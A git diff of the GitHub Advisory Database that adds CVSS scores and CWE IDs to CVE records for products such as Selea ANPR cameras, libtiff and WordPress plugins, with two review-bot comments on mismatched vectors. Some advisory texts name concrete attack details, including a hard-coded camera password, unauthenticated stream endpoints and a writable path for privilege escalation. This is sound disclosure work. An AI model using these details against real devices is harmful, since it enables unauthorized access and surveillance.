b/advisories/unreviewed/2025/12/GHSA-5p74-h2ww-pwhx/GHSA-5p74-h2ww-pwhx.json index 8331c747fe4e7..a638e28366adb 100644 --- a/advisories/unreviewed/2025/12/GHSA-5p74-h2ww-pwhx/GHSA-5p74-h2ww-pwhx.json +++ b/advisories/unreviewed/2025/12/GHSA-5p74-h2ww-pwhx/GHSA-5p74-h2ww-pwhx.json 
@@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-5p74-h2ww-pwhx", - "modified": "2025-12-09T21:31:49Z", + "modified": "2026-02-23T21:31:22Z", "published": "2025-12-09T21:31:49Z", "aliases": [ "CVE-2021-47731" ], "details": "Selea Targa IP OCR-ANPR Camera contains a hard-coded developer password vulnerability that allows unauthorized configuration access through an undocumented page. Attackers can exploit the hidden endpoint by using the hard-coded password 'Selea781830' to enable configuration upload and overwrite device settings.", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2025/12/GHSA-g8pv-w9gq-24x8/GHSA-g8pv-w9gq-24x8.json b/advisories/unreviewed/2025/12/GHSA-g8pv-w9gq-24x8/GHSA-g8pv-w9gq-24x8.json index ab5471840e3af..dd3266421ac24 100644 --- a/advisories/unreviewed/2025/12/GHSA-g8pv-w9gq-24x8/GHSA-g8pv-w9gq-24x8.json +++ b/advisories/unreviewed/2025/12/GHSA-g8pv-w9gq-24x8/GHSA-g8pv-w9gq-24x8.json 
@@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-g8pv-w9gq-24x8", - "modified": "2025-12-09T21:31:49Z", + "modified": "2026-02-23T21:31:22Z", "published": "2025-12-09T21:31:48Z", "aliases": [ "CVE-2021-47730" ], "details": "Selea Targa IP OCR-ANPR Camera contains a cross-site request forgery vulnerability that allows attackers to create administrative users without authentication. Attackers can craft a malicious web page that submits a form to add a new admin user with full system privileges when a logged-in user visits the page.", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" @@ -42,6 +46,7 @@ ], "database_specific": { "cwe_ids": [ + "CWE-352", "CWE-798" ], "severity": "HIGH", diff --git a/advisories/unreviewed/2025/12/GHSA-mrj4-3c4j-jh3r/GHSA-mrj4-3c4j-jh3r.json b/advisories/unreviewed/2025/12/GHSA-mrj4-3c4j-jh3r/GHSA-mrj4-3c4j-jh3r.json index cf78534b4bc0a..02cba6773eb9d 100644 --- a/advisories/unreviewed/2025/12/GHSA-mrj4-3c4j-jh3r/GHSA-mrj4-3c4j-jh3r.json +++ b/advisories/unreviewed/2025/12/GHSA-mrj4-3c4j-jh3r/GHSA-mrj4-3c4j-jh3r.json 
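Review bot: The CVSS_V3 vector added in the first hunk scores availability as `A:H`, while the CVSS_V4 vector already in the record has `VA:N` for the same CSRF issue, so the two entries in `severity` now disagree. The same happens in the GHSA-mrj4-3c4j-jh3r hunk, where the new V3 vector has `C:L` against `VC:H` in V4 for unauthenticated access to live video streams. Tooling that reads only one vector, or takes the higher of the two, will derive different ratings for the same advisory; the sync should either reconcile the vectors with their sources or record which one `database_specific.severity` is derived from.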
@@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-mrj4-3c4j-jh3r", - "modified": "2025-12-09T21:31:49Z", + "modified": "2026-02-23T21:31:22Z", "published": "2025-12-09T21:31:48Z", "aliases": [ "CVE-2021-47727" ], "details": "Selea Targa IP OCR-ANPR Camera contains an unauthenticated vulnerability that allows remote attackers to access live video streams without authentication. Attackers can directly connect to RTP/RTSP or M-JPEG streams by requesting specific endpoints like p1.mjpg or p1.264 to view camera footage.", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2025/12/GHSA-mx39-grv7-hq6w/GHSA-mx39-grv7-hq6w.json b/advisories/unreviewed/2025/12/GHSA-mx39-grv7-hq6w/GHSA-mx39-grv7-hq6w.json index f7c4ffd6af420..9576f6064124d 100644 --- a/advisories/unreviewed/2025/12/GHSA-mx39-grv7-hq6w/GHSA-mx39-grv7-hq6w.json +++ b/advisories/unreviewed/2025/12/GHSA-mx39-grv7-hq6w/GHSA-mx39-grv7-hq6w.json 
@@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-mx39-grv7-hq6w", - "modified": "2025-12-09T21:31:49Z", + "modified": "2026-02-23T21:31:22Z", "published": "2025-12-09T21:31:49Z", "aliases": [ "CVE-2021-47728" ], "details": "Selea Targa IP OCR-ANPR Camera contains an unauthenticated command injection vulnerability in utils.php that allows remote attackers to execute arbitrary shell commands. Attackers can exploit the 'addr' and 'port' parameters to inject commands and gain www-data user access through chained local file inclusion techniques.", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2026/02/GHSA-3f33-44xm-29m7/GHSA-3f33-44xm-29m7.json b/advisories/unreviewed/2026/02/GHSA-3f33-44xm-29m7/GHSA-3f33-44xm-29m7.json index b1ae3f23e9c00..dffc8fb573841 100644 --- a/advisories/unreviewed/2026/02/GHSA-3f33-44xm-29m7/GHSA-3f33-44xm-29m7.json +++ b/advisories/unreviewed/2026/02/GHSA-3f33-44xm-29m7/GHSA-3f33-44xm-29m7.json @@ -25,7 +25,9 @@ } ], "database_specific": { - "cwe_ids": [], + "cwe_ids": [ + "CWE-200" + ], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2026/02/GHSA-42h9-mr3g-6gc2/GHSA-42h9-mr3g-6gc2.json b/advisories/unreviewed/2026/02/GHSA-42h9-mr3g-6gc2/GHSA-42h9-mr3g-6gc2.json index 2742fee72f225..e6a1524316992 100644 --- a/advisories/unreviewed/2026/02/GHSA-42h9-mr3g-6gc2/GHSA-42h9-mr3g-6gc2.json +++ b/advisories/unreviewed/2026/02/GHSA-42h9-mr3g-6gc2/GHSA-42h9-mr3g-6gc2.json 
@@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-42h9-mr3g-6gc2", - "modified": "2026-02-20T18:31:39Z", + "modified": "2026-02-23T21:31:23Z", "published": "2026-02-20T18:31:39Z", "aliases": [ "CVE-2026-26721" ], "details": "An issue in Key Systems Inc Global Facilities Management Software v.20230721a allows a remote attacker to obtain sensitive information via the sid query parameter.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N" + } + ], "affected": [], "references": [ { @@ -20,8 +25,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-598" + ], + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-20T17:25:55Z" diff --git a/advisories/unreviewed/2026/02/GHSA-438c-878c-qvmf/GHSA-438c-878c-qvmf.json b/advisories/unreviewed/2026/02/GHSA-438c-878c-qvmf/GHSA-438c-878c-qvmf.json index 22520aafcf059..bd33623c08239 100644 --- a/advisories/unreviewed/2026/02/GHSA-438c-878c-qvmf/GHSA-438c-878c-qvmf.json +++ b/advisories/unreviewed/2026/02/GHSA-438c-878c-qvmf/GHSA-438c-878c-qvmf.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-438c-878c-qvmf", - "modified": "2026-02-23T15:31:15Z", + "modified": "2026-02-23T21:31:26Z", "published": "2026-02-23T15:31:15Z", "aliases": [ "CVE-2025-69700" ], "details": "Tenda FH1203 V2.0.1.6 contains a stack-based buffer overflow vulnerability in the modify_add_client_prio function, which is reachable via the formSetClientPrio CGI handler.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } + ], "affected": [], "references": [ { @@ -20,8 +25,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-121" + ], + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-23T14:16:21Z" 
diff --git a/advisories/unreviewed/2026/02/GHSA-4phc-m7h5-frwr/GHSA-4phc-m7h5-frwr.json b/advisories/unreviewed/2026/02/GHSA-4phc-m7h5-frwr/GHSA-4phc-m7h5-frwr.json
new file mode 100644
index 0000000000000..5b83eed52a118
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-4phc-m7h5-frwr/GHSA-4phc-m7h5-frwr.json
@@ -0,0 +1,44 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-4phc-m7h5-frwr",
+ "modified": "2026-02-23T21:31:27Z",
+ "published": "2026-02-23T21:31:26Z",
+ "aliases": [
+ "CVE-2025-61147"
+ ],
+ "details": "strukturag libde265 commit d9fea9d wa discovered to contain a segmentation fault via the component decoder_context::compute_framedrop_table().",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-61147"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/strukturag/libde265/issues/484"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/strukturag/libde265/commit/8b17e0930f77db07f55e0b89399a8f054ddbecf7"
+ },
+ {
+ "type": "WEB",
+ "url": "https://gist.github.com/optionGo/e6567a1c2bc4e0c9fee4e1e8be8d6af9"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-120"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-23T20:28:52Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-5fqg-ph33-v8fc/GHSA-5fqg-ph33-v8fc.json b/advisories/unreviewed/2026/02/GHSA-5fqg-ph33-v8fc/GHSA-5fqg-ph33-v8fc.json
new file mode 100644
index 0000000000000..d0d0ee3e3688d
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-5fqg-ph33-v8fc/GHSA-5fqg-ph33-v8fc.json
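Review bot: In the `details` string of the new GHSA-4phc-m7h5-frwr record, "wa discovered" should read "was discovered". The libde265 issue and commit URLs are both typed `WEB`; if that commit is the fix for the reported crash (its listing next to the issue suggests so, but the record does not state it), `"type": "FIX"` on the commit and `"type": "REPORT"` on the issue would let consumers locate the patch without parsing URLs.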
@@ -0,0 +1,40 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-5fqg-ph33-v8fc",
+ "modified": "2026-02-23T21:31:27Z",
+ "published": "2026-02-23T21:31:27Z",
+ "aliases": [
+ "CVE-2025-63945"
+ ],
+ "details": "A privilege escalation (PE) vulnerability in the Tencent iOA app thru 210.9.28693.621001 on Windows devices enables a local user to execute programs with elevated privileges. However, execution requires that the local user is able to successfully exploit a race condition.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-63945"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/alexlee820/CVE-2025-63945-Tencent-iOA-EoP"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/alexlee820/Tencent-iOA-EoP"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-59"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-23T20:28:52Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-5jj2-qhxw-rpq6/GHSA-5jj2-qhxw-rpq6.json b/advisories/unreviewed/2026/02/GHSA-5jj2-qhxw-rpq6/GHSA-5jj2-qhxw-rpq6.json
new file mode 100644
index 0000000000000..545cbc6e1ac54
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-5jj2-qhxw-rpq6/GHSA-5jj2-qhxw-rpq6.json
@@ -0,0 +1,37 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-5jj2-qhxw-rpq6",
+ "modified": "2026-02-23T21:31:26Z",
+ "published": "2026-02-23T21:31:26Z",
+ "aliases": [
+ "CVE-2025-61145"
+ ],
+ "details": "libtiff up to v4.7.1 was discovered to contain a double free via the component tools/tiffcrop.c.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-61145"
+ },
+ {
+ "type": "WEB",
+ "url": "https://gist.github.com/optionGo/062f109569196dbffd8ac12020b42289"
+ },
+ {
+ "type": "WEB",
+ "url": "https://gitlab.com/libtiff/libtiff/-/issues/736"
+ },
+ {
+ "type": "WEB",
+ "url": "https://gitlab.com/libtiff/libtiff/-/merge_requests/753"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-23T19:22:56Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-6235-7hp8-952p/GHSA-6235-7hp8-952p.json b/advisories/unreviewed/2026/02/GHSA-6235-7hp8-952p/GHSA-6235-7hp8-952p.json
new file mode 100644
index 0000000000000..0a4cdbe49db4a
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-6235-7hp8-952p/GHSA-6235-7hp8-952p.json
@@ -0,0 +1,52 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-6235-7hp8-952p",
+ "modified": "2026-02-23T21:31:28Z",
+ "published": "2026-02-23T21:31:28Z",
+ "aliases": [
+ "CVE-2026-3026"
+ ],
+ "details": "A vulnerability has been found in erzhongxmu JEEWMS 3.7. Affected by this issue is some unknown functionality of the file /plug-in/ueditor/jsp/getRemoteImage.jsp of the component UEditor. The manipulation of the argument upfile leads to server-side request forgery. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"
+ },
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-3026"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?ctiid.347382"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?id.347382"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?submit.756522"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.notion.so/JEEWMS-SSRF-Vulnerability-in-UEditor-Module-304ea92a3c41806782b1f7285ab0d580"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-918"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-23T21:19:12Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-6v87-78cw-pw29/GHSA-6v87-78cw-pw29.json b/advisories/unreviewed/2026/02/GHSA-6v87-78cw-pw29/GHSA-6v87-78cw-pw29.json
index e91bfff082e87..fe7018310d739 100644
--- a/advisories/unreviewed/2026/02/GHSA-6v87-78cw-pw29/GHSA-6v87-78cw-pw29.json
+++ b/advisories/unreviewed/2026/02/GHSA-6v87-78cw-pw29/GHSA-6v87-78cw-pw29.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-6v87-78cw-pw29", - "modified": "2026-02-20T18:31:38Z", + "modified": "2026-02-23T21:31:23Z", "published": "2026-02-20T18:31:38Z", "aliases": [ "CVE-2026-22351" ], "details": "Missing Authorization vulnerability in Marcus (aka @msykes) WP FullCalendar wp-fullcalendar allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WP FullCalendar: from n/a through <= 1.6.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-862" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-20T16:22:34Z" diff --git a/advisories/unreviewed/2026/02/GHSA-6x8c-24f7-p33h/GHSA-6x8c-24f7-p33h.json b/advisories/unreviewed/2026/02/GHSA-6x8c-24f7-p33h/GHSA-6x8c-24f7-p33h.json index 277e3a41fc38d..e8bac2532749c 100644 --- a/advisories/unreviewed/2026/02/GHSA-6x8c-24f7-p33h/GHSA-6x8c-24f7-p33h.json +++ b/advisories/unreviewed/2026/02/GHSA-6x8c-24f7-p33h/GHSA-6x8c-24f7-p33h.json 
@@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-6x8c-24f7-p33h", - "modified": "2026-02-19T18:31:54Z", + "modified": "2026-02-23T21:31:22Z", "published": "2026-02-19T18:31:54Z", "aliases": [ "CVE-2025-15561" ], "details": "An attacker can exploit the update behavior of the WorkTime monitoring daemon to elevate privileges on the local system to NT Authority\\SYSTEM. A malicious executable must be named  WTWatch.exe and dropped in the C:\\ProgramData\\wta\\ClientExe directory, which is writable by \"Everyone\". The executable will then be run by the WorkTime monitoring daemon.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-269" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-19T11:15:56Z" diff --git a/advisories/unreviewed/2026/02/GHSA-744p-mq95-2m92/GHSA-744p-mq95-2m92.json b/advisories/unreviewed/2026/02/GHSA-744p-mq95-2m92/GHSA-744p-mq95-2m92.json index 091aa4689286b..e94df78e83641 100644 --- a/advisories/unreviewed/2026/02/GHSA-744p-mq95-2m92/GHSA-744p-mq95-2m92.json +++ b/advisories/unreviewed/2026/02/GHSA-744p-mq95-2m92/GHSA-744p-mq95-2m92.json 
@@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-744p-mq95-2m92", - "modified": "2026-02-23T18:32:02Z", + "modified": "2026-02-23T21:31:26Z", "published": "2026-02-23T18:32:02Z", "aliases": [ "CVE-2026-26464" ], "details": "Stored Cross-Site Scripting (XSS) was found in the /admin/edit_user.php page of Society Management System Portal V1.0, which allows remote attackers to inject and store arbitrary JavaScript code that is executed in users' browsers. This vulnerability can be exploited via the name parameter in a POST HTTP request, leading to execution of malicious scripts when the affected content is viewed by other users, including administrators.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } + ], "affected": [], "references": [ { @@ -21,7 +26,7 @@ ], "database_specific": { "cwe_ids": [], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-23T18:25:51Z" diff --git a/advisories/unreviewed/2026/02/GHSA-74m2-9pf8-f794/GHSA-74m2-9pf8-f794.json b/advisories/unreviewed/2026/02/GHSA-74m2-9pf8-f794/GHSA-74m2-9pf8-f794.json index bcaa9512d2aef..487cde5b35df5 100644 --- a/advisories/unreviewed/2026/02/GHSA-74m2-9pf8-f794/GHSA-74m2-9pf8-f794.json +++ b/advisories/unreviewed/2026/02/GHSA-74m2-9pf8-f794/GHSA-74m2-9pf8-f794.json 
@@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-74m2-9pf8-f794", - "modified": "2026-02-19T18:31:54Z", + "modified": "2026-02-23T21:31:22Z", "published": "2026-02-19T18:31:54Z", "aliases": [ "CVE-2026-2735" ], "details": "Stored Cross-Site Scripting (XSS) in Alkacon's OpenCms v18.0, which occurs when user input is not properly validated when sending a POST request to ‘/blog/new-article/org.opencms.ugc.CmsUgcEditService.gwt’ using the ‘text’ parameter.", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2026/02/GHSA-75j9-8g79-fp7r/GHSA-75j9-8g79-fp7r.json b/advisories/unreviewed/2026/02/GHSA-75j9-8g79-fp7r/GHSA-75j9-8g79-fp7r.json new file mode 100644 index 0000000000000..2766a5156fa8b --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-75j9-8g79-fp7r/GHSA-75j9-8g79-fp7r.json 
@@ -0,0 +1,44 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-75j9-8g79-fp7r",
+ "modified": "2026-02-23T21:31:26Z",
+ "published": "2026-02-23T21:31:26Z",
+ "aliases": [
+ "CVE-2025-61146"
+ ],
+ "details": "saitoha libsixel until v1.8.7 was discovered to contain a memory leak via the component malloc_stub.c.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-61146"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/saitoha/libsixel/issues/207"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/saitoha/libsixel/commit/e0ba6685262a3679cc5b9009c0c5b7dc8a3f262e"
+ },
+ {
+ "type": "WEB",
+ "url": "https://gist.github.com/optionGo/1100e5be05c5558501a95f5e99160584"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-401"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-23T19:22:56Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-7mg3-vfc7-xvch/GHSA-7mg3-vfc7-xvch.json b/advisories/unreviewed/2026/02/GHSA-7mg3-vfc7-xvch/GHSA-7mg3-vfc7-xvch.json
new file mode 100644
index 0000000000000..9ac214368c59e
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-7mg3-vfc7-xvch/GHSA-7mg3-vfc7-xvch.json
@@ -0,0 +1,40 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-7mg3-vfc7-xvch",
+ "modified": "2026-02-23T21:31:27Z",
+ "published": "2026-02-23T21:31:27Z",
+ "aliases": [
+ "CVE-2026-23694"
+ ],
+ "details": "Aruba HiSpeed Cache (aruba-hispeed-cache) WordPress plugin versions prior to 3.0.5 contain a cross-site request forgery (CSRF) vulnerability affecting multiple administrative AJAX actions. The handlers for ahsc_reset_options, ahsc_debug_status, and ahsc_enable_purge perform authentication and capability checks but do not verify a WordPress nonce for state-changing requests. An attacker can induce a logged-in administrator to visit a malicious webpage that submits forged requests to admin-ajax.php, resulting in unauthorized resetting of plugin settings, toggling of the WordPress WP_DEBUG configuration, or modification of cache purging behavior without the administrator’s intent.",
+ "severity": [
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23694"
+ },
+ {
+ "type": "WEB",
+ "url": "https://hosting.aruba.it/en/wordpress.aspx"
+ },
+ {
+ "type": "WEB",
+ "url": "https://wordpress.org/plugins/aruba-hispeed-cache"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-352"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-23T21:19:10Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-8gq5-mm3m-7h4x/GHSA-8gq5-mm3m-7h4x.json b/advisories/unreviewed/2026/02/GHSA-8gq5-mm3m-7h4x/GHSA-8gq5-mm3m-7h4x.json
index 75d8610497366..b43fbe851c532 100644
--- a/advisories/unreviewed/2026/02/GHSA-8gq5-mm3m-7h4x/GHSA-8gq5-mm3m-7h4x.json
+++ b/advisories/unreviewed/2026/02/GHSA-8gq5-mm3m-7h4x/GHSA-8gq5-mm3m-7h4x.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-8gq5-mm3m-7h4x", - "modified": "2026-02-23T00:30:26Z", + "modified": "2026-02-23T21:31:25Z", "published": "2026-02-23T00:30:26Z", "aliases": [ "CVE-2026-2588" ], "details": "Crypt::NaCl::Sodium versions through 2.001 for Perl has an integer overflow flaw on 32-bit systems.\n\nSodium.xs casts a STRLEN (size_t) to unsigned long long when passing a length pointer to libsodium functions. On 32-bit systems size_t is typically 32-bits while an unsigned long long is at least 64-bits.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -31,7 +36,7 @@ "cwe_ids": [ "CWE-190" ], - "severity": null, + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-23T00:15:59Z" diff --git a/advisories/unreviewed/2026/02/GHSA-8p85-wjp4-3w4m/GHSA-8p85-wjp4-3w4m.json b/advisories/unreviewed/2026/02/GHSA-8p85-wjp4-3w4m/GHSA-8p85-wjp4-3w4m.json index 7a16e09527da0..3e504a74c51f0 100644 --- a/advisories/unreviewed/2026/02/GHSA-8p85-wjp4-3w4m/GHSA-8p85-wjp4-3w4m.json +++ b/advisories/unreviewed/2026/02/GHSA-8p85-wjp4-3w4m/GHSA-8p85-wjp4-3w4m.json 
